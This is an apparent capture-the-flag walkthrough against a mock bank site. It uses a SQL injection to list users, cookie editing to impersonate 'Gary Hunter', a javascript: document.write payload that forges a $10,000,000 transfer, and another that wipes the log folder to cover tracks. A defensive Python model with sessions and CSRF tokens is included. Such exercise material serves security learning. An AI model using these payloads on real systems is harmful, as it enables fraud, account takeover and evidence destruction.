Cookie Injection, JavaScript Injection & SQL Injection Method
Information
From the navigation and source code of pages, we gather the following information:

| Description | Page | Fields |
| --- | --- | --- |
| Register pages | Register.php > register2.php | |
| Login pages | login1.php > login2.php | |
| Purge files | cleardir.php | <input type='hidden' name='dir' value='loginSQLFiles'> |
| Transfer money from one account to another | movemoney.php | |
Authentication cookie (created after successful authentication):
- accountUsername=<login>
- accountPassword=<password>
Our target:
- Name: Gary Hunter
- Transfer $10,000,000 into the account dropCash.
- Log directory: logFiles
Objective 1: Find the account of Gary Hunter
First create your own account and log in. Once done, type the following command in the URL bar: javascript:alert(document.cookie); It shows our cookie value, indicating that the site is vulnerable. Then go to the user info page and enter a SQL injection to show the list of all users: ' or 'a'='a
By scrolling down, we find:
GaryWilliamHunter : — $$$$$ —
The 2 values are separated by a colon:
- Before colon: the login (GaryWilliamHunter)
- After colon: the description (– $$$$$ –)
Objective 2: Move the $10,000,000 into the account dropCash
By entering the following code in the URL, we see that the site is vulnerable to cookie injection because it displays the cookie information in the clear.
javascript:alert(document.cookie);
Install Firebug and Firecookie for Firefox. We then have to change the value of the cookie named "accountUsername" to "GaryWilliamHunter" and use the following JS injection (copy/paste in the URL):
javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))
It will dynamically write a form on the page, containing the necessary values for a transfer:
- FORM ACTION: movemoney.php, as specified in the exercise
- FROM: value taken from the modified cookie (GaryWilliamHunter)
- TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
- AMOUNT: value specified in the exercise. We know this field from the information we gathered.
Submitting the form completes the stage.
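As an added illustration from the defender's side (not part of the original writeup), the following Python models why the transfer above works: movemoney.php takes the sender from the client-editable accountUsername cookie and accepts any POST that carries TO and AMOUNT, including a form written into the page by script. The hardened handler, with the ledger, session store and function names all constructed here, derives the sender from an opaque server-side session and requires a per-session CSRF token in the form.

```python
import secrets

def make_balances() -> dict:
    """Constructed sample ledger (not from the original site)."""
    return {"GaryWilliamHunter": 10_000_000, "dropCash": 0, "attacker": 100}

def transfer(balances: dict, sender: str, to: str, amount: int) -> bool:
    """Move funds only if the sender exists and can cover the amount."""
    if amount <= 0 or balances.get(sender, 0) < amount:
        return False
    balances[sender] -= amount
    balances[to] = balances.get(to, 0) + amount
    return True

def movemoney_vulnerable(balances: dict, cookies: dict, form: dict) -> bool:
    """Models the page's movemoney.php: the sender is whatever the
    accountUsername cookie says, so whoever edits that cookie picks the victim."""
    return transfer(balances, cookies.get("accountUsername", ""),
                    form["TO"], int(form["AMOUNT"]))

SESSIONS: dict = {}  # server-side session store (constructed)

def login(username: str) -> str:
    """Issue a random session id; the username itself never goes to the client."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid

def movemoney_hardened(balances: dict, cookies: dict, form: dict) -> bool:
    """Sender comes from the server-side session, and the POST must carry the
    session's CSRF token, so a script-written form without it is rejected."""
    session = SESSIONS.get(cookies.get("sid", ""))
    if session is None:
        return False
    if not secrets.compare_digest(form.get("csrf", ""), session["csrf"]):
        return False
    return transfer(balances, session["user"], form["TO"], int(form["AMOUNT"]))

def demo() -> tuple:
    """Replay the writeup's request against both handlers."""
    injected_form = {"TO": "dropCash", "AMOUNT": "10000000"}  # the document.write form
    vuln_ledger = make_balances()
    vuln_ok = movemoney_vulnerable(vuln_ledger,
                                   {"accountUsername": "GaryWilliamHunter"}, injected_form)
    hard_ledger = make_balances()
    sid = login("attacker")  # attacker only ever holds their own session
    hard_ok = movemoney_hardened(hard_ledger, {"sid": sid}, injected_form)
    return vuln_ok, vuln_ledger["dropCash"], hard_ok, hard_ledger["GaryWilliamHunter"]
```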
Objective 3: Clear The Logs, They’re held in the folder ‘logFiles’
Copy/paste the following code in the URL:
javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))
PS: You can also use the Firefox add-on “Tamper Data” or Google Chrome’s “Inspect Element” option instead of Firecookie and Firebug.